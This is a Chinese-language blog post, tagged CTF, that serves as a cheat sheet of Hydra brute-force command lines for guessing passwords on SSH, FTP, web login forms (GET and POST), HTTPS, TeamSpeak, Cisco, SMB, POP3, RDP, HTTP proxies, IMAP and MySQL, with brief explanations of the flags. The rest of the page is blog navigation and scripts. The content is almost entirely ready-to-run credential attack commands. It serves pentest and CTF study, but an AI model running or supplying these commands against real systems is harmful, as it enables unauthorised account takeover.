破解ssh:

hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh

破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form “/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password”
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form “login.php:id=^USER^&passwd=^PASS^:wrong username or password
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。) </p> <h2 id="破解https:"><a href="#破解https:" class="headerlink" title="破解https:"></a>破解https:</h2><p>hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https </p> <h2 id="破解teamspeak:"><a href="#破解teamspeak:" class="headerlink" title="破解teamspeak:"></a>破解teamspeak:</h2><p>hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak </p> <h2 id="破解cisco:"><a href="#破解cisco:" class="headerlink" title="破解cisco:"></a>破解cisco:</h2><p>hydra -P pass.txt 10.36.16.18 cisco<br>hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable </p> <h2 id="破解smb:"><a href="#破解smb:" class="headerlink" title="破解smb:"></a>破解smb:</h2><p>hydra -l administrator -P pass.txt 10.36.16.18 smb </p> <h2 id="破解pop3:"><a href="#破解pop3:" class="headerlink" title="破解pop3:"></a>破解pop3:</h2><p>hydra -l muts -P pass.txt my.pop3.mail pop3 </p> <h2 id="破解rdp:"><a href="#破解rdp:" class="headerlink" title="破解rdp:"></a>破解rdp:</h2><p>hydra ip rdp -l administrator -P pass.txt -V </p> <h2 id="破解http-proxy:"><a href="#破解http-proxy:" class="headerlink" title="破解http-proxy:"></a>破解http-proxy:</h2><p>hydra -l admin -P pass.txt http-proxy://10.36.16.18 </p> <h2 id="破解imap:"><a href="#破解imap:" class="headerlink" title="破解imap:"></a>破解imap:</h2><p>hydra -L user.txt -p secret 10.36.16.18 imap PLAIN<br>hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</p> <h2 id="爆破mysql:"><a href="#爆破mysql:" class="headerlink" title="爆破mysql:"></a>爆破mysql:</h2><p>hydra -L ./user.txt -P ./password.txt -t 2 -e n -f -v 192.168.43.17 mysql<br>mysql远程连接:mysql -h ip -u root -p</p> </article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://jielunya.github.io">JieLun杰伦</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://jielunya.github.io/2022/12/02/Hydra%E5%B8%B8%E7%94%A8%E7%88%86%E7%A0%B4%E8%AF%AD%E5%8F%A5/">https://jielunya.github.io/2022/12/02/Hydra常用爆破语句/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://jielunya.github.io" target="_blank">做 讓 人 远 远 聽 見 的 風</a>!</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CTF/">CTF</a></div><div class="post_share"><div class="social-share" data-image="/assets/15_updated.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/12/07/Openstack%E4%BA%91%E5%B9%B3%E5%8F%B0%E7%9A%84%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/"><img class="prev-cover" src="/img/loading3.gif" data-original="/assets/16_updated.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Openstack云平台的基础运维</div></div></a></div><div class="next-post pull-right"><a href="/2022/12/02/Windows%E7%BD%91%E7%BB%9C%E5%91%BD%E4%BB%A4/"><img class="next-cover" src="/img/loading3.gif" data-original="/assets/14_updated.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Windows网络命令</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2024/02/05/HGAME-week1/" title="HGAME-WEEK1"><img class="cover" src="/img/loading3.gif" data-original="/assets/67_updated.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-02-05</div><div class="title">HGAME-WEEK1</div></div></a></div><div><a href="/2023/01/12/weevely%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8/" title="weevely工具的使用"><img class="cover" src="/img/loading3.gif" data-original="/assets/58_updated.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-01-12</div><div class="title">weevely工具的使用</div></div></a></div><div><a href="/2022/12/24/%E5%88%A9%E7%94%A8MSF%E8%BF%9B%E8%A1%8C%E7%B3%BB%E7%BB%9F%E6%8F%90%E6%9D%83/" title="利用MSF进行系统提权"><img class="cover" src="/img/loading3.gif" data-original="/assets/45_updated.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-12-24</div><div class="title">利用MSF进行系统提权</div></div></a></div><div><a href="/2022/12/19/MSF%E3%81%AEreverse_tcp%E5%8F%8D%E5%90%91%E8%BF%9E%E6%8E%A5/" title="MSFのreverse_tcp反向连接"><img class="cover" src="/img/loading3.gif" data-original="/assets/44_updated.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-12-19</div><div class="title">MSFのreverse_tcp反向连接</div></div></a></div><div><a href="/2022/12/16/MS08_067%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(xp%E7%B3%BB%E7%BB%9F%E6%B8%97%E9%80%8F%EF%BC%89/" title="MS08_067漏洞复现(xp系统渗透)"><img class="cover" src="/img/loading3.gif" data-original="/assets/41_updated.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-12-16</div><div class="title">MS08_067漏洞复现(xp系统渗透)</div></div></a></div><div><a href="/2022/12/13/%E4%BD%BF%E7%94%A8MSF%E6%A1%86%E6%9E%B6%E8%BF%9B%E8%A1%8C%E7%B3%BB%E7%BB%9F%E6%B8%97%E9%80%8F%EF%BC%88%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%EF%BC%89/" title="使用MSF框架进行系统渗透(永恒之蓝)"><img class="cover" src="/img/loading3.gif" data-original="/assets/35_updated.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-12-13</div><div class="title">使用MSF框架进行系统渗透(永恒之蓝)</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/loading3.gif" data-original="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">JieLun杰伦</div><div class="author-info__description">一个收藏回忆与分享技术的地方!</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">29</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">11</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/Jielunya"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">你又来偷偷看我啦( ´͈ ᵕ `͈ )◞♡</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A0%B4%E8%A7%A3ssh%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">破解ssh:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A0%B4%E8%A7%A3ftp%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">破解ftp:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#get%E6%96%B9%E5%BC%8F%E6%8F%90%E4%BA%A4%EF%BC%8C%E7%A0%B4%E8%A7%A3web%E7%99%BB%E5%BD%95%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">get方式提交,破解web登录:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#post%E6%96%B9%E5%BC%8F%E6%8F%90%E4%BA%A4%EF%BC%8C%E7%A0%B4%E8%A7%A3web%E7%99%BB%E5%BD%95%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">post方式提交,破解web登录:</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2024/04/01/%E4%BA%91%E7%AD%BE%E7%BD%B2%E7%AD%BE%E5%90%8D/" title="某云签署签名算法逆向分析"><img src="/img/loading3.gif" data-original="/assets/68_updated.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="某云签署签名算法逆向分析"/></a><div class="content"><a class="title" href="/2024/04/01/%E4%BA%91%E7%AD%BE%E7%BD%B2%E7%AD%BE%E5%90%8D/" title="某云签署签名算法逆向分析">某云签署签名算法逆向分析</a><time datetime="2024-04-01T08:45:58.826Z" title="发表于 2024-04-01 16:45:58">2024-04-01</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/02/05/HGAME-week1/" title="HGAME-WEEK1"><img src="/img/loading3.gif" data-original="/assets/67_updated.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HGAME-WEEK1"/></a><div class="content"><a class="title" href="/2024/02/05/HGAME-week1/" title="HGAME-WEEK1">HGAME-WEEK1</a><time datetime="2024-02-05T13:13:59.859Z" title="发表于 2024-02-05 21:13:59">2024-02-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/11/07/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/" title="命令执行绕过姿势(持续更新)"><img src="/img/loading3.gif" data-original="/assets/66_updated.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="命令执行绕过姿势(持续更新)"/></a><div class="content"><a class="title" href="/2023/11/07/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87/" title="命令执行绕过姿势(持续更新)">命令执行绕过姿势(持续更新)</a><time datetime="2023-11-07T06:45:34.446Z" title="发表于 2023-11-07 14:45:34">2023-11-07</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/08/04/Vulhub%E7%AC%94%E8%AE%B0/" title="Vulhub笔记"><img src="/img/loading3.gif" data-original="/assets/64_updated.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Vulhub笔记"/></a><div class="content"><a class="title" href="/2023/08/04/Vulhub%E7%AC%94%E8%AE%B0/" title="Vulhub笔记">Vulhub笔记</a><time datetime="2023-08-04T13:30:40.650Z" title="发表于 2023-08-04 21:30:40">2023-08-04</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/03/13/2023%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E4%B8%8E%E8%AF%84%E4%BC%B0%E6%A0%B7%E9%A2%98%E7%AC%94%E8%AE%B0/" title="2023信息安全管理与评估样题笔记"><img src="/img/loading3.gif" data-original="/assets/56_updated.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="2023信息安全管理与评估样题笔记"/></a><div class="content"><a class="title" href="/2023/03/13/2023%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E4%B8%8E%E8%AF%84%E4%BC%B0%E6%A0%B7%E9%A2%98%E7%AC%94%E8%AE%B0/" title="2023信息安全管理与评估样题笔记">2023信息安全管理与评估样题笔记</a><time datetime="2023-03-13T02:14:21.393Z" title="发表于 2023-03-13 10:14:21">2023-03-13</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">©2020 - 2024 By JieLun杰伦</div><a href="https://jielunya.github.io/">| 回到首页 |</a><span class="footer-separator"></span></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/medium-zoom/dist/medium-zoom.min.js"></script><div class="js-pjax"><script>function loadValine () { function initValine () { const valine = new Valine(Object.assign({ el: '#vcomment', appId: 'lYh5FaNQ1BZ91AnnMwXvpfdH-gzGzoHsz', appKey: 'WcwABcRIFzBCppEfa2FauntP', avatar: 'monsterid', serverURLs: 'https://lyh5fanq.lc-cn-n1-shared.com', emojiMaps: "", path: window.location.pathname, visitor: false }, null)) } if (typeof Valine === 'function') initValine() else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine) } if ('Valine' === 'Valine' || !false) { if (false) btf.loadComment(document.getElementById('vcomment'),loadValine) else setTimeout(loadValine, 0) } else { function loadOtherComment () { loadValine() } }</script></div><script src="/js/fairyDustCursor.js"></script><script async data-pjax src="/js/sky.js"></script><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/fireworks.min.js"></script></div><!-- hexo injector body_end start --><div class="js-pjax"><script async="async">var arr = document.getElementsByClassName('recent-post-item'); for(var i = 0;i<arr.length;i++){ arr[i].classList.add('wow'); arr[i].classList.add('animate__zoomIn'); arr[i].setAttribute('data-wow-duration', '1.5s'); arr[i].setAttribute('data-wow-delay', '1s'); arr[i].setAttribute('data-wow-offset', '100'); arr[i].setAttribute('data-wow-iteration', '1'); }</script><script async="async">var arr = document.getElementsByClassName('card-widget'); for(var i = 0;i<arr.length;i++){ arr[i].classList.add('wow'); arr[i].classList.add('animate__zoomIn'); arr[i].setAttribute('data-wow-duration', ''); arr[i].setAttribute('data-wow-delay', ''); arr[i].setAttribute('data-wow-offset', ''); arr[i].setAttribute('data-wow-iteration', ''); }</script></div><script defer src="/js/wow.min.js"></script><script defer src="/js/wow_init.js"></script><!-- hexo injector body_end end --> <style> [bg-lazy] { background-image: none !important; background-color: #eee !important; } </style> <script> window.imageLazyLoadSetting = { isSPA: false, preloadRatio: 1, processImages: null, }; </script><script>window.addEventListener("load",function(){var t=/\.(gif|jpg|jpeg|tiff|png)$/i,r=/^data:image\/[a-z]+;base64,/;Array.prototype.slice.call(document.querySelectorAll("img[data-original]")).forEach(function(a){var e=a.parentNode;"A"===e.tagName&&(e.href.match(t)||e.href.match(r))&&(e.href=a.dataset.original)})});</script><script>!function(r){r.imageLazyLoadSetting.processImages=t;var e=r.imageLazyLoadSetting.isSPA,n=r.imageLazyLoadSetting.preloadRatio||1,c=a();function a(){var t=Array.prototype.slice.call(document.querySelectorAll("img[data-original]")),e=Array.prototype.slice.call(document.querySelectorAll("[bg-lazy]"));return t.concat(e)}function t(){e&&(c=a());for(var t,o=0;o<c.length;o++)0<=(t=(t=c[o]).getBoundingClientRect()).bottom&&0<=t.left&&t.top<=(r.innerHeight*n||document.documentElement.clientHeight*n)&&function(){var t,e,n,a,i=c[o];e=function(){c=c.filter(function(t){return i!==t}),r.imageLazyLoadSetting.onImageLoaded&&r.imageLazyLoadSetting.onImageLoaded(i)},(t=i).hasAttribute("bg-lazy")?(t.removeAttribute("bg-lazy"),e&&e()):(n=new Image,a=t.getAttribute("data-original"),n.onload=function(){t.src=a,t.removeAttribute("data-original"),e&&e()},t.src!==a&&(n.src=a))}()}function i(){clearTimeout(t.tId),t.tId=setTimeout(t,500)}t(),document.addEventListener("scroll",i),r.addEventListener("resize",i),r.addEventListener("orientationchange",i)}(this);</script></body></html>